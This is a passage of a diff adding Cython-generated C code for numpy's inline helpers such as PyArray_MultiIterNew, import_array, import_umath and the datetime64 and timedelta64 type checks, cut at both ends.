"../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew3", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(4, a, b, c, d) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew4(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew4", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":786 + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + * return PyArray_MultiIterNew(4, a, b, c, d) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(4, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 786, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(4, a, b, c, d) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew4", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew5(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d, PyObject *__pyx_v_e) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew5", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":789 + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + * return PyArray_MultiIterNew(5, a, b, c, d, e) # <<<<<<<<<<<<<< + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(5, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d), ((void *)__pyx_v_e)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 789, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew5", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + * cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyDataType_SHAPE(PyArray_Descr *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("PyDataType_SHAPE", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + __pyx_t_1 = PyDataType_HASSUBARRAY(__pyx_v_d); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":793 + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape # <<<<<<<<<<<<<< + * else: + * return () + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject*)__pyx_v_d->subarray->shape)); + __pyx_r = ((PyObject*)__pyx_v_d->subarray->shape); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":795 + * return d.subarray.shape + * else: + * return () # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_empty_tuple); + __pyx_r = __pyx_empty_tuple; + goto __pyx_L0; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + * cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + +static CYTHON_INLINE void __pyx_f_5numpy_set_array_base(PyArrayObject *__pyx_v_arr, PyObject *__pyx_v_base) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":971 + * + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! # <<<<<<<<<<<<<< + * PyArray_SetBaseObject(arr, base) + * + */ + Py_INCREF(__pyx_v_base); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":972 + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) # <<<<<<<<<<<<<< + * + * cdef inline object get_array_base(ndarray arr): + */ + (void)(PyArray_SetBaseObject(__pyx_v_arr, __pyx_v_base)); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_get_array_base(PyArrayObject *__pyx_v_arr) { + PyObject *__pyx_v_base; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("get_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":975 + * + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) # <<<<<<<<<<<<<< + * if base is NULL: + * return None + */ + __pyx_v_base = PyArray_BASE(__pyx_v_arr); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + __pyx_t_1 = (__pyx_v_base == NULL); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":977 + * base = PyArray_BASE(arr) + * if base is NULL: + * return None # <<<<<<<<<<<<<< + * return base + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":978 + * if base is NULL: + * return None + * return base # <<<<<<<<<<<<<< + * + * # Versions of the import_* functions which are more suitable for + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject *)__pyx_v_base)); + __pyx_r = ((PyObject *)__pyx_v_base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_array(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_array", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":984 + * cdef inline int import_array() except -1: + * try: + * __pyx_import_array() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") + */ + __pyx_t_4 = _import_array(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 984, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":985 + * try: + * __pyx_import_array() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.multiarray failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 985, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__16, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 986, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 986, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_umath(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_umath", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":990 + * cdef inline int import_umath() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 990, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":991 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 991, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__17, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 992, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 992, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_ufunc(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_ufunc", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":996 + * cdef inline int import_ufunc() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 996, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":997 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 997, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":998 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__17, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 998, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 998, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_timedelta64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_timedelta64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1013 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyTimedeltaArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyTimedeltaArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_datetime64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_datetime64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1028 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyDatetimeArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyDatetimeArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + +static CYTHON_INLINE npy_datetime 